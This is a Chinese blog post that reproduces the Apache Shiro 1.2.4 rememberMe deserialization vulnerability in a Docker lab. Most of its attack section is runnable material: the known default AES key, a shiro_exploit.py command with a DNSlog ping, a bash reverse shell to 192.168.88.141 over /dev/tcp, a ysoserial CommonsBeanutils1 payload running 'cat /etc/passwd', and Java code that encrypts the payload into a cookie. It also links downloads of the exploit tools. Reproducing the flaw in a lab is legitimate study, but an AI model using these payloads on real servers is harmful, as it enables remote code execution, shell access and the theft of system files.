Apache-shiro反序列化

最新推荐文章于 2024-08-07 19:51:54 发布
最新推荐文章于 2024-08-07 19:51:54 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/105685265
版权

使用docker搭建环境

获取docker镜像

docker pull medicean/vulapps:s_shiro_1

重启docker

systemctl restart docker

启动docker镜像:

docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1

访问:

http://localhost:8081/ 环境搭建成功

在这里插入图片描述

一、检查有没有默认key

检测脚本工具:https://pan.baidu.com/s/1ksvF105y_D86NhpCwEEJ5A
提取码:vg0x

在这里插入图片描述

二、dnslog获取IP

用上面的脚本工具

获取dnslog的域名替换 {dnshost}
用检测出来的key替换掉kPH+bIxk5D2deZiIxcaaaA==

python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="

在这里插入图片描述
在这里插入图片描述

三、反弹shell

反弹工具:https://pan.baidu.com/s/1ihgt1aps6lxft-mGzBrBkQ
提取码:v0y1

先用检测出来的key,替换脚本里面的key。
先生成rememberMe

python shiro_1.2.4.py "echo '/bin/bash -i >& /dev/tcp/192.168.88.141/8088 0>&1' >> a.txt &&bash a.txt"

在这里插入图片描述
登陆,替换cookie,监听端口。
在这里插入图片描述
在这里插入图片描述
反弹成功
在这里插入图片描述

四、burp回显

先生成poc.ser文件

java -jar ysoserial.jar CommonsBeanutils1 "cat /etc/passwd" > poc.ser

使用Shiro内置的默认密钥对Payload进行加密:

java调试

package org.vulhub.shirodemo;

import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.io.DefaultSerializer;

import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;

public class TestRemember {
    public static void main(String[] args) throws Exception {
        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));

        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));

        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}

发送rememberMe Cookie,即可成功执行cat /etc/passwd

haha13l4
关注
专栏目录
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7713
shiro -550 反序列化(一)
shiro反序列化
热门推荐
weixin_48776804的博客
05-12 1万+
shiro反序列化
Shiro框架漏洞复现(附修复方法)
最新发布
C233333235的博客
08-07 621
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。在Shiro框架下,用户登陆成功后会生成一个经过加密的Cookie。其Cookie的Key的值为RememberMe,Value的值是经过序列化、AES加密和Base64编码后得到的结果。
shiro反序列化分析
2301_79724395的博客
06-11 1095
Apache Shiro 是一个 Java 安全框架,包括如下功能和特性:Authentication:身份认证/登陆,验证用户是不是拥有相应的身份。在 Shiro 中,所有的操作都是基于当前正在执行的用户,这里称之为一个 Subject,在用户任意代码位置都可以轻易取到这个Subject。
Apache-Shiro反序列化1
08-03
Apache Shiro反序列化机制存在漏洞,该漏洞允许攻击者在服务器上执行恶意命令。Shiro反序列化机制使用 Java 的反序列化机制,将用户输入的数据反序列化为 Java 对象。如果攻击者可以控制用户输入的数据,就...
061-Apache Shiro 反序列化之殇.pdf
09-20
Apache Shiro是一款流行的开源安全框架,它提供了身份...总的来说,Apache Shiro反序列化漏洞揭示了软件安全的重要性,尤其是对于处理敏感信息的应用程序。及时的更新和严格的安全策略可以帮助保护系统免受此类威胁。
shiro反序列化工具,加强版
12-27
在"shiro反序列化工具,加强版"这个主题中,我们主要关注的是Shiro框架中可能存在的反序列化漏洞以及如何利用和防范这些漏洞。 反序列化漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有...
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
Apache Shiro反序列化攻击技术剖析与防护研判分析
不忘初心,护天下安全!
08-11 1383
攻击者确可利用漏洞制造具有威胁的请求内容,防守者亦可利用默认的密钥和Gadget进行解密尝试,且一定可以解密成功,直接分析编码前的内容是否是渗透所用payload;攻击者使用Fuzzing测试的思路,直接制造无效的危险请求内容,防守者亦可利用默认的密钥和Gadget进行解密尝试,且一定可以解密成功,直接分析编码前的内容是否是渗透所用payload。尽管rememberMe字段参数值是一串AES加密后的结果,但因为攻击者利用的漏洞原理是“公开的算法+默认的密钥”,则以其之道还施彼身即可。...
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。
shiro反序列化复现.zip
08-03
shiro反序列化复现工具包;shiro反序列化复现工具包;
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
Apache Shiro反序列化漏洞
qq_63980959的博客
02-29 1136
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。​ 首先说一下何为序列化,序列化就是指把Java对象转换为字节序列的过程,shiro框架为java框架同时使用了序列化。shiro框架的整体流程为:用户登录成功时会生成一段由序列化–>aes加密—>base64编码构成的cookie值。
shiro反序列化总结
qq_31812157的博客
03-11 615
但由于request的inputbuffer会复用,所以在修改完maxHeaderSize之后,需要多个连接同时访问(burp开多线程跑),让tomcat新建request的inputbuffer,这时候的buffer的大小就会使用修改后的值。这里附上poc,使用方法和上面相同,还是对class进行base64编码,放到cc2中生成序列化文件,如果有用过天下大木头师傅的文件的,这个文件和他有点小区别,我们可以把这个类进行类加载,因此cc2,cc3,cc4都是可以用这个类,因为他们是调用了。
[Java反序列化]—Shiro反序列化(三)
Sentiment的博客
06-29 1725
前篇通过CC链加载动态字节码进行了代码执行,但这种方式是需要我们自身加入CC依赖的,有很大的局限性。所以本篇就对shiro的原生依赖的利用进行分析在了解前先了解下定义类必是具体的和公共的,并且具有无参数的。JavaBean 通过提供符合一致性设计模式的公共方法将内部域暴露成员属性,set和get方法获取。(大概意思就是必须是一个公开类,并且有无参构造器和对应的、方法)Demo就类似于这种,公开类、有无参构造器、有对应属性的set或、get方法 Commons-Beanutils 是应用于的工具,他提供了一种
漏洞复现——shiro反序列化
小林说安全的博客
05-22 5421
漏洞复现——shiro反序列化
Apache shiro 反序列化工具
05-23
为了检测和利用 Apache Shiro 反序列化漏洞,可以使用一些反序列化工具,如 ysoserial、ShiroExploit 等。 其中,ysoserial 是一个常用的 Java 反序列化工具,可以生成各种常见的 Java 反序列化漏洞利用 payload,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值